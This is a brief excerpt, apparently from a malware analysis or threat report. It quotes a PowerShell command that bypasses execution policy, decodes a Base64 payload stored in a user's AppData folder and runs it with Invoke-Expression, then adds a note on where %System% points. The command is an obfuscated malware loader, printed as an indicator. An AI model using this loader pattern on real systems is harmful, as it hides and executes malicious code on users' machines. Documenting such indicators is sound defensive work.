  • "%System%\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Get-Content -Path 'C:\Users\{Username}\AppData\Local\webs\dat'))))"

(Note: %System% is the Windows system folder, where it usually is C:\Windows\System32 on all Windows operating system versions.)
